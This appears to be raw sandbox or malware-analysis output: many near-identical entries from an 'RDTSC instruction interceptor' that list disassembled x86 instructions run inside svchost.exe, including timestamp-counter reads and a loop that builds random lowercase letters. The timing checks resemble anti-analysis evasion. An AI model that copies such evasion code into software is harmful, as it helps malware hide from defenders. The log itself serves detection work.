Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59875h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FB96h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59850h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59653h 0x00000031 call 2AA4FB96h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA591D0h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59653h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59250h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA598B3h 0x00000031 call 2AA4FB96h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59850h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59213h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA598B3h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59350h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59375h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4F8F6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59690h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59375h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4F9F6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59850h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59244h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA598F0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59313h 0x00000031 call 2AA4FEF6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59130h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59453h 0x00000031 call 2AA4FD36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59690h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59515h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4F9F6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59350h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA594E4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59313h 0x00000033 call 2AA4FB96h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA598F0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59124h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59813h 0x00000031 call 2AA4FEF6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59250h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59375h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FEF6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59490h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59313h 0x00000033 call 2AA4F9F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA598E4h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59653h 0x00000031 call 2AA4FEF6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59850h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59653h 0x00000031 call 2AA4FEF6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59490h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA591D0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA596B5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4F876h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59850h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59544h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59653h 0x00000033 call 2AA4F7D6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA598B3h 0x00000031 call 2AA4F9F6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59130h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59653h 0x00000033 call 2AA4FB96h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59250h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
